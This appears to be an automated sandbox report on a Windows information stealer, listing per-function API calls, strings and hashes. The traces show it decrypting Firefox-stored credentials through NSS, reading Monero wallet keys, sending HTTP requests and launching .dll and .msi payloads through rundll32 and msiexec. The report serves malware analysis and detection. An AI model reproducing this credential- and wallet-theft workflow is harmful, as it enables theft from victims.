Associated: 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456651859.000000006CB5E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456666418.000000006CB62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cad0000_file.jbxd

Similarity

API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
String ID: NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
API String ID: 1702738223-3894940629
Opcode ID: f2e84f3de06ebc0718c8ac69644c328e7cfa62f6f06e290002f31d39885a11df
Instruction ID: dec830049a9c829097923f67ca0c65f897f981089c0ec1e87457ac98fef1afbc
Opcode Fuzzy Hash: f2e84f3de06ebc0718c8ac69644c328e7cfa62f6f06e290002f31d39885a11df
Instruction Fuzzy Hash: 1F6118B06003849FEB019FA5CC09BA9BBBCFF4A308F88855CE5049B641D7B59995CFE0

Function 00ABC990 Relevance: 28.4, APIs: 15, Strings: 1, Instructions: 384filestringCOMMON

Download Yara Rule

APIs

NSS_Init.NSS3(00000000), ref: 00ABC9A5

Part of subcall function 00ACA740: lstrcpy.KERNEL32(00AD0E17,00000000), ref: 00ACA788

Part of subcall function 00ACA920: lstrcpy.KERNEL32(00000000,?), ref: 00ACA972
Part of subcall function 00ACA920: lstrcat.KERNEL32(00000000), ref: 00ACA982

Part of subcall function 00ACA8A0: lstrcpy.KERNEL32(?,00AD0E17), ref: 00ACA905

Part of subcall function 00ACA9B0: lstrlen.KERNEL32(?,005E8CA8,?,\Monero\wallet.keys,00AD0E17), ref: 00ACA9C5
Part of subcall function 00ACA9B0: lstrcpy.KERNEL32(00000000), ref: 00ACAA04
Part of subcall function 00ACA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ACAA12

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,005EDE18,00000000,?,00AD144C,00000000,?,?), ref: 00ABCA6C
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00ABCA89
GetFileSize.KERNEL32(00000000,00000000), ref: 00ABCA95
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00ABCAA8
ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00ABCAD9
StrStrA.SHLWAPI(?,005EDED8,00AD0B52), ref: 00ABCAF7
StrStrA.SHLWAPI(00000000,005EDE90), ref: 00ABCB1E
StrStrA.SHLWAPI(?,005EE188,00000000,?,00AD1458,00000000,?,00000000,00000000,?,005E8AC8,00000000,?,00AD1454,00000000,?), ref: 00ABCCA2
StrStrA.SHLWAPI(00000000,005EE208), ref: 00ABCCB9

Part of subcall function 00ABC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00ABC871
Part of subcall function 00ABC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00ABC87C
Part of subcall function 00ABC820: PK11_GetInternalKeySlot.NSS3 ref: 00ABC88A
Part of subcall function 00ABC820: PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 00ABC8A5
Part of subcall function 00ABC820: PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 00ABC8EB
Part of subcall function 00ABC820: PK11_FreeSlot.NSS3(?), ref: 00ABC961

StrStrA.SHLWAPI(?,005EE208,00000000,?,00AD145C,00000000,?,00000000,005E8AD8), ref: 00ABCD5A
StrStrA.SHLWAPI(00000000,005E8C58), ref: 00ABCD71

Part of subcall function 00ABC820: lstrcat.KERNEL32(?,00AD0B46), ref: 00ABC943
Part of subcall function 00ABC820: lstrcat.KERNEL32(?,00AD0B47), ref: 00ABC957
Part of subcall function 00ABC820: lstrcat.KERNEL32(?,00AD0B4E), ref: 00ABC978

lstrlen.KERNEL32(00000000), ref: 00ABCE44
CloseHandle.KERNEL32(00000000), ref: 00ABCE9C
NSS_Shutdown.NSS3 ref: 00ABCEAA

Strings

, xrefs: 00ABC9C6

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcat$lstrcpy$K11_lstrlen$PointerSlot$AuthenticateBinaryCloseCreateCryptDecryptFreeHandleInitInternalReadShutdownSizeString
String ID:
API String ID: 1052888304-3916222277
Opcode ID: 68dc035da639c798e2e86bd3b3499157268f6ae6a1cc37f6cbd68812ee4f643e
Instruction ID: ba633c63f8b912bada45bd8f7e5f2f61c6192b9cc7dc3f89a41b0ae9d5e8d905
Opcode Fuzzy Hash: 68dc035da639c798e2e86bd3b3499157268f6ae6a1cc37f6cbd68812ee4f643e
Instruction Fuzzy Hash: 0BE1EBB290010CABDB14EBA4DD96FFEB778AF24304F51415DF106B6191EF306A4ACB66

Function 6CAE9590 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 192libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6CAD31C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6CAD3217
Part of subcall function 6CAD31C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6CAD3236
Part of subcall function 6CAD31C0: FreeLibrary.KERNEL32 ref: 6CAD324B
Part of subcall function 6CAD31C0: __Init_thread_footer.LIBCMT ref: 6CAD3260
Part of subcall function 6CAD31C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6CAD327F
Part of subcall function 6CAD31C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CAD328E
Part of subcall function 6CAD31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CAD32AB
Part of subcall function 6CAD31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CAD32D1
Part of subcall function 6CAD31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6CAD32E5
Part of subcall function 6CAD31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6CAD32F7

LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6CAE9675
__Init_thread_footer.LIBCMT ref: 6CAE9697
LoadLibraryW.KERNEL32(ntdll.dll), ref: 6CAE96E8
GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6CAE9707
__Init_thread_footer.LIBCMT ref: 6CAE971F
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6CAE9773
GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6CAE97B7
FreeLibrary.KERNEL32 ref: 6CAE97D0
FreeLibrary.KERNEL32 ref: 6CAE97EB
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6CAE9824

Strings

Api-ms-win-core-memory-l1-1-5.dll, xrefs: 6CAE9670
MapViewOfFileNuma2, xrefs: 6CAE97B1
NtMapViewOfSection, xrefs: 6CAE9701
ntdll.dll, xrefs: 6CAE96E3

Memory Dump Source

Source File: 00000000.00000002.2456589135.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAD0000, based on PE: true

Associated: 00000000.00000002.2456560223.000000006CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456651859.000000006CB5E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456666418.000000006CB62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cad0000_file.jbxd

Similarity

API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
API String ID: 3361784254-3880535382
Opcode ID: d57258e83425208e358032b0506718741ebd00a57a8cf8ad5e1cd2de88663716
Instruction ID: 2093a59b7913c16a0f226f63fd686fd4ed4ce7de6778d9e21167111eed48dc28
Opcode Fuzzy Hash: d57258e83425208e358032b0506718741ebd00a57a8cf8ad5e1cd2de88663716
Instruction Fuzzy Hash: 6161D0717003459FDF00DFB9E984BDABBB5EB4E324F944529E91593780D730A898CB91

Function 00AC9010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00AC906C

Strings

image/jpeg, xrefs: 00AC9136

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: CreateGlobalStream
String ID: image/jpeg
API String ID: 2244384528-3785015651
Opcode ID: 15d92eca32b3642fecbb281671b5ed327d624fbd7d33bdcaa5a47d4232cfd9c5
Instruction ID: 964e09c189e8f215938869655cd9f95a4a723e3e30096cb32a87598970ee3eef
Opcode Fuzzy Hash: 15d92eca32b3642fecbb281671b5ed327d624fbd7d33bdcaa5a47d4232cfd9c5
Instruction Fuzzy Hash: 6F71F0B5910208ABDB14EFE4DD99FEEB7B8BF48700F108508F519E7290DB75A905CB62

Function 6CB2D4D0 Relevance: 21.2, APIs: 14, Instructions: 165threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6CB2D4F0
AcquireSRWLockExclusive.KERNEL32(?), ref: 6CB2D4FC
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CB2D52A
GetCurrentThreadId.KERNEL32 ref: 6CB2D530
AcquireSRWLockExclusive.KERNEL32(?), ref: 6CB2D53F
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CB2D55F
free.MOZGLUE(00000000), ref: 6CB2D585
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6CB2D5D3
GetCurrentThreadId.KERNEL32 ref: 6CB2D5F9
AcquireSRWLockExclusive.KERNEL32(?), ref: 6CB2D605
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CB2D652
GetCurrentThreadId.KERNEL32 ref: 6CB2D658
AcquireSRWLockExclusive.KERNEL32(?), ref: 6CB2D667
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CB2D6A2

Memory Dump Source

Source File: 00000000.00000002.2456589135.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAD0000, based on PE: true

Associated: 00000000.00000002.2456560223.000000006CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456651859.000000006CB5E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456666418.000000006CB62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cad0000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
String ID:
API String ID: 2206442479-0
Opcode ID: d90536d404f5fd680aafa07b11a73fb7590697bbd9729af725a2e7082b9b7eff
Instruction ID: 56ec730cd6e2a5d3d669e03a230a166cb3ab3319514b5190f103db1d3e2bb07a
Opcode Fuzzy Hash: d90536d404f5fd680aafa07b11a73fb7590697bbd9729af725a2e7082b9b7eff
Instruction Fuzzy Hash: C5518C71604745DFC704DF35C488AAABBF4FF89318F508A2EE85A87750DB34A889CB91

Function 00AC17A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,block), ref: 00AC17C5
ExitProcess.KERNEL32 ref: 00AC17D1

Strings

block, xrefs: 00AC17B7

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: block
API String ID: 621844428-2199623458
Opcode ID: 80476505f0fd5a3ac83a6e638bee38502f0ccca5ee7fcd7c8fbd24e05c30c173
Instruction ID: 1d58af273bf31b2675d584db083916a2ac3e78d4dd1c24dc1b72e215585da098
Opcode Fuzzy Hash: 80476505f0fd5a3ac83a6e638bee38502f0ccca5ee7fcd7c8fbd24e05c30c173
Instruction Fuzzy Hash: A05125B4B04209EBCB04DFA0D954FBE77B5BF49704F11844EE40AAB282E770E951CB62

Function 00AC2E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON

Download Yara Rule

APIs

Part of subcall function 00ACA740: lstrcpy.KERNEL32(00AD0E17,00000000), ref: 00ACA788

ShellExecuteEx.SHELL32(0000003C), ref: 00AC31C5
ShellExecuteEx.SHELL32(0000003C), ref: 00AC335D
ShellExecuteEx.SHELL32(0000003C), ref: 00AC34EA

Strings

C:\Windows\system32\rundll32.exe, xrefs: 00AC3332
.dll, xrefs: 00AC31E5
C:\Windows\system32\msiexec.exe, xrefs: 00AC34BF
/passive, xrefs: 00AC345B
/i ", xrefs: 00AC33E4
.msi, xrefs: 00AC3398
<, xrefs: 00AC3490
"" , xrefs: 00AC309A

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: ExecuteShell$lstrcpy
String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
API String ID: 2507796910-3625054190
Opcode ID: c0933ee5c91538b5581beea633a009ffc6052862723e6c9f3b09acf437eab6a7
Instruction ID: b8b6901b7b8c3f73538dbea85a50cbd99f058c61d7048cf124c8130a853756f7
Opcode Fuzzy Hash: c0933ee5c91538b5581beea633a009ffc6052862723e6c9f3b09acf437eab6a7
Instruction Fuzzy Hash: 2012EA7290010C9BDB19EBA0DE92FEEB738AF24304F51455DE50676191EF342B4ACFA6

Function 6CB1EC70 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6CB19420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CAE4A68), ref: 6CB1945E
Part of subcall function 6CB19420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CB19470
Part of subcall function 6CB19420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CB19482
Part of subcall function 6CB19420: __Init_thread_footer.LIBCMT ref: 6CB1949F

GetCurrentThreadId.KERNEL32 ref: 6CB1EC84
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CB1EC8C

Part of subcall function 6CB194D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CB194EE
Part of subcall function 6CB194D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CB19508

GetCurrentThreadId.KERNEL32 ref: 6CB1ECA1
AcquireSRWLockExclusive.KERNEL32(6CB5F4B8), ref: 6CB1ECAE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6CB1ECC5
ReleaseSRWLockExclusive.KERNEL32(6CB5F4B8), ref: 6CB1ED0A
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6CB1ED19
CloseHandle.KERNEL32(?), ref: 6CB1ED28
free.MOZGLUE(00000000), ref: 6CB1ED2F
ReleaseSRWLockExclusive.KERNEL32(6CB5F4B8), ref: 6CB1ED59

Strings

[I %d/%d] profiler_ensure_started, xrefs: 6CB1EC94

Memory Dump Source

Source File: 00000000.00000002.2456589135.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAD0000, based on PE: true

Associated: 00000000.00000002.2456560223.000000006CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456651859.000000006CB5E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456666418.000000006CB62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cad0000_file.jbxd

Similarity

API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
String ID: [I %d/%d] profiler_ensure_started
API String ID: 4057186437-125001283
Opcode ID: 936fd716e61c582a0481fde0209d947ee7a7b9fb3e080406bcab4e86ab64102f
Instruction ID: 805018b925402bb3cf9b347ba6a8822af796490672cef7d862fdb3a66cd5df9e
Opcode Fuzzy Hash: 936fd716e61c582a0481fde0209d947ee7a7b9fb3e080406bcab4e86ab64102f
Instruction Fuzzy Hash: EE21C475604198ABEF019F64DC08AAEBB7AEF4636CF944210FD1897F41DB319815CBA2

Function 00AC52C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00ACA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00ACA7E6

Part of subcall function 00AB6280: InternetOpenA.WININET(00AD0DFE,00000001,00000000,00000000,00000000), ref: 00AB62E1
Part of subcall function 00AB6280: StrCmpCA.SHLWAPI(?,005EFB80), ref: 00AB6303
Part of subcall function 00AB6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00AB6335
Part of subcall function 00AB6280: HttpOpenRequestA.WININET(00000000,GET,?,005EF198,00000000,00000000,00400100,00000000), ref: 00AB6385
Part of subcall function 00AB6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00AB63BF
Part of subcall function 00AB6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00AB63D1

Part of subcall function 00ACA8A0: lstrcpy.KERNEL32(?,00AD0E17), ref: 00ACA905

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00AC5318
lstrlen.KERNEL32(00000000), ref: 00AC532F

Part of subcall function 00AC8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00AC8E52

StrStrA.SHLWAPI(00000000,00000000), ref: 00AC5364
lstrlen.KERNEL32(00000000), ref: 00AC5383
lstrlen.KERNEL32(00000000), ref: 00AC53AE

Part of subcall function 00ACA740: lstrcpy.KERNEL32(00AD0E17,00000000), ref: 00ACA788

Strings

ERROR, xrefs: 00AC5432
ERROR, xrefs: 00AC53B9
